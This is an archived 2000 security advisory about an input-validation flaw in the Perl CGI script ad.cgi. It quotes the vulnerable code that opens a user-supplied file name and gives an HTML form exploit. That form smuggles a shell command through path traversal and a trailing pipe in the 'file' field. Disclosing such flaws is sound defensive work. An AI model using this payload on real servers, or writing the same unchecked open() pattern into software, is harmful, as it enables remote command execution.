Insecure input validation in ad.cgi

2000-12-13T00:00:00
ID SECURITYVULNS:DOC:1065
Type securityvulns
Reporter Securityvulns
Modified 2000-12-13T00:00:00

Description

Hi,

ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation vulnerability.

Information on ad.cgi is available at: http://www.conservatives.net/atheist/scripts/index.html?ads

----code snippet---- $filename = "$FORM{'file'}"; $datafile = "$basedir" . "$filename"; ... open (INFO, "$datafile"); -----------------

Exploit:

<html> <form action="http://www.conservatives.net/someplace/ad.cgi" method=POST> <h1>ad.cgi exploit</h1> Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|"> <input type=submit value=run> </form> </html>